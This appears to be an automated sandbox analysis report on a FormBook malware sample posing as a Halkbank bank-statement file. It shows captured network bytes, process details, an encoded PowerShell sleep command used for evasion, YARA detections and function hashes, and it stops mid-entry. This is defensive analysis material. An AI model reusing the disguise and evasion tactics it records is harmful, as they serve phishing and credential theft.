2022-01-28 21:14:32 UTC	472	IN	Data Raw: 00 2a f1 2b 26 03 2b 01 00 00 ae 8c 06 00 02 8f 28 26 0d 2d 1e 18 02 00 00 00 00 00 00 00 16 00 0a 30 03 00 00 00 2a 00 2b 04 00 00 83 7d 07 2b 26 26 04 2d 1d 03 02 00 00 00 00 00 00 00 11 00 09 30 03 00 00 00 2a f6 2b 26 03 2b 04 00 00 83 7b 26 08 2d 1c 16 02 00 00 00 00 00 00 00 11 00 0a 30 03 00 00 2a f5 2b 26 03 2b 06 00 04 e7 28 16 26 09 2d 17 19 02 00 00 00 00 00 00 00 12 00 0a 30 03 00 00 2a 00 2b 06 00 01 2f 28 07 2b 26 26 26 26 06 2d 18 14 70 00 00 43 72 06 00 02 c5 28 06 00 02 c3 28 86 00 00 2a 02 7a 0a 00 00 2c 73 06 2b 06 00 02 88 28 01 00 00 34 a5 06 00 05 fb 6f 02 00 00 ea 74 03 02 1e 2b 06 00 02 88 28 6c 76 06 00 00 31 6f 02 00 00 0f 74 03 02 33 2b 06 00 02 88 28 6c 76 06 00 05 15 6f 02 00 00 bb 74 03 02 48 2b 06 00 02 88 28 6c 06 00 04 8e Data Ascii: +&+(&-0+}+&&-0+&+{&-0+&+(&-0+/(+&&&&-pCr((z,s+(4ot+(lv1ot3+(lvotH+(l
2022-01-28 21:14:32 UTC	488	IN	Data Raw: 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 00 69 06 fe 14 04 00 00 e5 7b 02 06 00 04 c7 28 00 12 0a 04 00 00 e5 7b 02 25 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 01 84 06 fe 14 04 00 00 f7 7b 02 06 00 04 c7 28 00 12 0a 04 00 00 f7 7b 02 25 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 01 6d 06 fe 14 04 00 00 9e 7b 02 06 00 04 c7 28 00 12 0a 04 00 00 9e 7b 02 25 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 01 40 06 fe 14 04 00 01 0b 7b 02 06 00 04 c7 28 00 12 0a 04 00 01 0b 7b 02 25 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 00 e8 06 fe 14 04 00 01 64 7b 02 06 00 04 c7 28 00 12 0a 04 00 01 64 7b 02 25 0a 00 01 45 6f 06 00 01 b6 73 06 00 02 27 73 06 00 01 a9 06 fe 14 04 00 00 f4 7b 02 06 00 04 c7 28 00 12 0a 04 00 00 f4 Data Ascii: Eos'si{({%Eos's{({%Eos'sm{({%Eos's@{({%Eos'sd{(d{%Eos's{(
2022-01-28 21:14:32 UTC	504	IN	Data Raw: 1d 06 00 04 eb 6f 04 2a f1 2b 0b 03 2b 06 00 05 bd 73 62 5f 3f 1f 07 26 0d 2d 1c 06 00 03 a9 6f 02 00 00 7d 74 04 06 00 05 be 6f 02 00 00 e3 74 03 2a 33 0a 1f 06 00 04 eb 6f 04 55 33 1a 06 00 04 eb 6f 03 2a 06 00 01 54 28 06 00 03 a8 73 0a 00 00 6a 28 06 00 04 e9 6f 04 03 02 18 33 1d 06 00 04 eb 6f 04 2a f1 2b 0a 03 2b 06 00 03 a8 73 62 5f 1f 1f 06 26 0d 2d 19 06 00 03 a9 6f 02 00 00 7d 74 04 06 00 03 a9 6f 02 00 00 7d 74 03 2a 33 0a 1f 06 00 04 eb 6f 04 55 33 0a 1f 06 00 04 eb 6f 03 11 00 00 6a 00 00 01 2f 00 1b 30 13 00 00 2a d9 2b 0a 03 2b 06 00 01 1c 6f 06 00 03 d6 6f 02 00 00 b2 a3 06 00 04 8e 6f 06 04 00 00 34 7b 02 25 06 00 03 d4 73 02 26 25 2d 1b 02 00 00 a3 74 03 11 00 00 69 00 00 00 32 00 0a 30 13 00 00 00 2a 06 00 01 1c 6f 06 00 05 fc 6f 08 25 Data Ascii: o++sb_?&-o}tot3oU3oT(sj(o3o++sb_&-o}to}t3oU3oj/0++ooo4{%s&%-ti20*oo%
2022-01-28 21:14:32 UTC	520	IN	Data Raw: 2e 13 1f 07 07 2e 0a 1f 07 53 2b 32 2e 1d 07 27 2e 1a 07 f4 2b 0b ed 2b 0a 06 2b 12 30 1d 07 26 0a 2d 1d 06 00 04 eb 6f 06 26 11 2d 1d 06 00 00 e5 6f 02 11 00 00 1b 00 00 00 96 00 0d 30 13 00 00 2a e3 2b 06 00 00 f3 28 e1 2b 04 00 00 33 7d 0e 2b 06 00 01 a0 28 06 0e 05 0e 04 0e 05 02 26 26 26 19 2d 1e 04 03 02 26 26 1a 2d 1d 03 02 00 00 00 00 00 00 00 2e 00 09 30 03 00 00 00 7a 0a 00 00 b2 73 06 00 05 70 28 17 e9 ed 46 20 42 00 00 2a 06 00 01 1c 28 06 00 03 a8 73 08 02 7a 0a 00 00 69 73 06 2b 0c 6d 0a 00 00 5b 28 06 00 05 2c 6f 02 00 00 bf 74 06 1a 2b 0c 88 ba 0a 00 00 5b 28 06 00 05 2c 6f 02 00 00 bf 74 06 15 2c 03 32 2b 0c 0a 00 00 50 28 06 00 05 2c 6f 02 00 00 bf 74 06 45 2b 0c b8 0a 00 00 50 28 06 00 05 2c 6f 02 00 00 bf 74 06 14 2c 03 2a 2c 01 fe 1a Data Ascii: ..S+2.'.+++0&-o&-o0+(+3}+(&&&-&&-.0zsp(F B(szis+m[(,ot+[(,ot,2+P(,otE+P(,ot,*,
2022-01-28 21:14:32 UTC	536	IN	Data Raw: 05 be 6f 02 00 00 e3 74 03 02 00 00 00 ba 38 06 00 00 32 28 6e 06 00 05 15 6f 02 00 00 bb 74 03 02 00 00 00 d1 38 06 00 00 32 28 6e 06 00 04 8e 6f 02 00 00 a3 74 03 02 00 00 00 e8 38 06 00 00 32 28 6a 06 00 02 8f 6f 02 00 00 4b 74 03 02 00 00 00 ff 38 06 00 00 32 28 6a 06 00 03 a9 6f 02 00 00 7d 74 03 02 00 00 01 16 38 06 00 00 32 28 6a 06 00 00 29 6f 02 00 00 0b 74 03 02 00 00 01 2d 38 06 00 00 32 28 6e 06 00 05 06 6f 02 00 00 b6 74 03 02 f4 2b 06 00 00 32 28 00 00 01 4b 38 26 26 07 2d 1a 6e 0a 00 00 4f 28 06 00 02 fa 6f 02 00 00 5e 74 03 02 00 00 01 61 38 83 2b 0a ff ff ff 7c 38 06 00 04 ef 28 0d 2b 00 00 01 35 00 00 00 37 00 00 00 14 00 00 01 75 00 00 01 75 00 00 01 75 00 00 01 61 00 00 00 93 00 00 01 75 00 00 00 d7 00 00 01 75 00 00 01 05 00 00 01 75 Data Ascii: ot82(not82(not82(joKt82(jo}t82(j)ot-82(not+2(K8&&-nO(o^ta8+\|8(+57uuuauuu

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Halkbank_Ekstre_20220128_081138_756957 (1).exePID: 3496, Parent PID: 4388

General

Target ID:	0
Start time:	22:13:17
Start date:	28/01/2022
Path:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe"
Imagebase:	0x750000
File size:	17408 bytes
MD5 hash:	749AAF49615AA07EDC9755541B213A4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.931638980.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.935355147.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4744, Parent PID: 3496

General

Target ID:	1
Start time:	22:13:18
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==
Imagebase:	0x1240000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5468, Parent PID: 4744

General

Target ID:	2
Start time:	22:13:19
Start date:	28/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Halkbank_Ekstre_20220128_081138_756957 (1).exePID: 2328, Parent PID: 3496

General

Target ID:	17
Start time:	22:15:20
Start date:	28/01/2022
Path:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
Imagebase:	0xb50000
File size:	17408 bytes
MD5 hash:	749AAF49615AA07EDC9755541B213A4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Halkbank_Ekstre_20220128_081138_756957 (1).exePID: 3496, Parent PID: 4388COMMON

Executed Functions

Function 05E9B438 Relevance: 4.9, Strings: 3, Instructions: 1115COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05E9BFAC
4, xrefs: 05E9BE2A
Xc#m, xrefs: 05E9C067

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: 4$Xc#m$Xc#m
API String ID: 0-2509299743
Opcode ID: cc6a42b5b874005bc92eff60230b45b79ec81a882bae20e7c64e2071a31f7a7f
Instruction ID: c9ee1c5c022a6b42b2c4b17cb732f361015b9bddc8d32658c64c066adebc0cf7
Opcode Fuzzy Hash: cc6a42b5b874005bc92eff60230b45b79ec81a882bae20e7c64e2071a31f7a7f
Instruction Fuzzy Hash: E9B21774A04218CFEB18DF94D984BADB7BAFF88304F118095E546AB3A5DB349D85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05E9B768 Relevance: 3.0, Strings: 2, Instructions: 507COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05E9BFAC
4, xrefs: 05E9BE2A

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: 4$Xc#m
API String ID: 0-3555349868
Opcode ID: 198551fb5698e9e30cd0ba2920b485e77dc6af31f162222829e664884961aeb0
Instruction ID: 76bfe04c86d6bb7a95d3c4f18c05c539ff7ff3a4bf040b0512485e9fad0c937c
Opcode Fuzzy Hash: 198551fb5698e9e30cd0ba2920b485e77dc6af31f162222829e664884961aeb0
Instruction Fuzzy Hash: F4321B74A04218CFEB28DFA4D984BADB7B6FF88304F1194A5E949AB355DB309D81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05E9E880 Relevance: 1.8, Strings: 1, Instructions: 518COMMON

Download Yara Rule

Strings

<n#m, xrefs: 05E9E9EE

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: <n#m
API String ID: 0-1415189675
Opcode ID: 0112d69a8ecc1fc31aced28a137021686aee39921a053ce744fbd334bd941481
Instruction ID: acaf3e2371cb716bd3e1d75338579023464a7e0156196b495a4cd2fc11247767
Opcode Fuzzy Hash: 0112d69a8ecc1fc31aced28a137021686aee39921a053ce744fbd334bd941481
Instruction Fuzzy Hash: 13125C74B00205CFDB18DF64C488A6AB7FABF89704B1584A9E646DB3B5DB31EC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05E97480 Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

y, xrefs: 05E974D4

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: y
API String ID: 0-4225443349
Opcode ID: 1d87340cdd57f4001d9832a530ef6e179384c7a730a84fb6518f0893a8104f2b
Instruction ID: f778175641443615ad4999e6975c82f6349dc1ce1883c71f7db70dcbe62a5ca1
Opcode Fuzzy Hash: 1d87340cdd57f4001d9832a530ef6e179384c7a730a84fb6518f0893a8104f2b
Instruction Fuzzy Hash: 1BC10835F182858FDF29CB69C8405AEBBB3FF86204F18C5AAD0E59B342D234E945C791

Uniqueness

Uniqueness Score: -1.00%

Function 05DB0F18 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

`"m, xrefs: 05DB0FB0

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: `"m
API String ID: 0-261396157
Opcode ID: 6bc62ef39db45b1365abc1e5367ff59e02a94c521b30b04fd427df187948979c
Instruction ID: a447452366e261fd156f29075071e636a32d0dddde1332d9abd553b5a1dfe956
Opcode Fuzzy Hash: 6bc62ef39db45b1365abc1e5367ff59e02a94c521b30b04fd427df187948979c
Instruction Fuzzy Hash: 41918C32F141148BE714DBA8DC94AAEB3A3BFC8614F1A8565E406DB798DF70DD02CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05E9E03C Relevance: .5, Instructions: 544COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c192453d9920cf84358f3b65160783ea80329bb755f3685521a86f92bb8b8ae
Instruction ID: cb22185abf623e4d434f9639475ca883f96dd2509a5531c9f87e8ce9a5a67dc1
Opcode Fuzzy Hash: 5c192453d9920cf84358f3b65160783ea80329bb755f3685521a86f92bb8b8ae
Instruction Fuzzy Hash: D222BD75B002149FDB08DFA4D884AADB7F6BF88304F048069EA46EB3A5DB71ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB0040 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bfca655e3b15ca2c699bc41b6aea3a341d7436548358f2fc7ec652b4336526
Instruction ID: ace8392091c103ed3f70b0caa2459e9edd41b02f2eb4afa4c1ca209ee6f36b45
Opcode Fuzzy Hash: d6bfca655e3b15ca2c699bc41b6aea3a341d7436548358f2fc7ec652b4336526
Instruction Fuzzy Hash: CFB17974E04218CFEB14CF69D888BAEB7F3BF89300F14856AD056AB254DB749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05E9F628 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65b9dc8d6ff1cde155b0ad752a7f2f65f4b2f535d96f25d96c94dae98fdf43ea
Instruction ID: ffa49b0fd91bbcea5d4d5e775eb504516c98cdde5f09b302632c0290b5a17460
Opcode Fuzzy Hash: 65b9dc8d6ff1cde155b0ad752a7f2f65f4b2f535d96f25d96c94dae98fdf43ea
Instruction Fuzzy Hash: DA813C39A10214DFDB29DFA4C48499EB7FAFF88314B1585A9E856DB360DB30EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05DB0162 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bcc99850610af52caf1cda8cfddf8c550a684093ae58bc5356e43cdda5e2a2
Instruction ID: 7ace903c0da570d3a115d408e3a351ab85076863200bc19147b1c29cbf08d579
Opcode Fuzzy Hash: 87bcc99850610af52caf1cda8cfddf8c550a684093ae58bc5356e43cdda5e2a2
Instruction Fuzzy Hash: 3581CF35E002258BEB14DF79D844AAEB7F3BFC8305B55D55AD402AB298CB34AD019F91

Uniqueness

Uniqueness Score: -1.00%

Function 05E9D460 Relevance: 3.0, Strings: 2, Instructions: 525COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05E9D565
Xc#m, xrefs: 05E9D555

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: Xc#m$Xc#m
API String ID: 0-3323715177
Opcode ID: 287684c88e7cfee43d1875e21aa3b844960162e9aa1386708bed20bdfb2c4822
Instruction ID: 98f187dfb8c4fdeb08552a442d672a0f06a2bfea1f72d65afd8867d028106f99
Opcode Fuzzy Hash: 287684c88e7cfee43d1875e21aa3b844960162e9aa1386708bed20bdfb2c4822
Instruction Fuzzy Hash: 3A227B74E00229CFDF19DFA4C954AFDBBB2FF48304F148455E852AB294DB749942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBCEE0 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05DBCF47
Xc#m, xrefs: 05DBCF57

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: Xc#m$Xc#m
API String ID: 0-3323715177
Opcode ID: 413ddc1f1f47331683e6c47c8457ef9e09d5acf4a84ace5a5ee3bc950ebf86a4
Instruction ID: 71acb6f02831a66b00f9d6495e664ad0f7d580ca172f5b858896131a2141325e
Opcode Fuzzy Hash: 413ddc1f1f47331683e6c47c8457ef9e09d5acf4a84ace5a5ee3bc950ebf86a4
Instruction Fuzzy Hash: 0421B470B1521ADBEB14DA55C894AEEBBBBBB4C600F1444ABE103A7264CBF0DD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E361 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

d, xrefs: 00E6E530

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 0d1d1d66d94d9db20cb860f4f46c92b357dbc8d0ca39fa741a6466b6dd98f4a1
Instruction ID: b60c49781b1221e57ff9d0f0c1e55551276a1451f6c8016977d5088a33da1749
Opcode Fuzzy Hash: 0d1d1d66d94d9db20cb860f4f46c92b357dbc8d0ca39fa741a6466b6dd98f4a1
Instruction Fuzzy Hash: 75E12874A0021ACFCF04DF94D8809EDBBB2FF89304B158955E515AB3A9DB34E985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F746 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

d, xrefs: 00E6FB09

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 76320e09de2c3a2c743ea43caba19956b447b5580183a9f50cda284d29d3dc08
Instruction ID: 4289f1e14a819ef74083870db20a531bdc666d3617a53383ebab9a1a0d73f659
Opcode Fuzzy Hash: 76320e09de2c3a2c743ea43caba19956b447b5580183a9f50cda284d29d3dc08
Instruction Fuzzy Hash: 40C18E35A00206CFCF14CF58E4949AAFBB2FF84354B19C5A9D909AF25AD730ED95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05E9A900 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

Xc#m, xrefs: 05E9A99B

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: Xc#m
API String ID: 0-3905349548
Opcode ID: c84dab8cb48aea06e5000dfaf701b374d07159f4ec71b88073dcff04645ddfef
Instruction ID: 70cabacf196a69ef1919fb5354819147826e542530175107a9c15bd8d937b97f
Opcode Fuzzy Hash: c84dab8cb48aea06e5000dfaf701b374d07159f4ec71b88073dcff04645ddfef
Instruction Fuzzy Hash: 5A41BF35B001158FCB18DFA9D4949AEB7B6FF85214B12847AEA46DB360DB31ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBB970 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

2, xrefs: 05DBBA19

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 48c3c19f9189a183c100790701d8fa75a3274135ca89bccd6b0383f1c236580c
Instruction ID: 54d6e673f656f999246db119619645525f792645fd3f7cf6e726f3b44b820271
Opcode Fuzzy Hash: 48c3c19f9189a183c100790701d8fa75a3274135ca89bccd6b0383f1c236580c
Instruction Fuzzy Hash: 1A313E75E04118EFEF04DF95E890AEEBBB6FF49311F10402BE852A7250DB719945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05E97470 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

y, xrefs: 05E974D4

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID: y
API String ID: 0-4225443349
Opcode ID: 83e5a07c17abc250f8cf56d49bf6e2878061f9db8315908f3e75dcbb72f1e963
Instruction ID: 31ac5cb09e045d177c1a53c14ba4d0580e3a6cc735431b9e6f406edd6f11d670
Opcode Fuzzy Hash: 83e5a07c17abc250f8cf56d49bf6e2878061f9db8315908f3e75dcbb72f1e963
Instruction Fuzzy Hash: 8121E170E18785DBEF38C76CC8843AEBAA2FB43214F40961AD0E657781D7759449C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 05DBEEE8 Relevance: .9, Instructions: 892COMMON

Download Yara Rule

Memory Dump Source

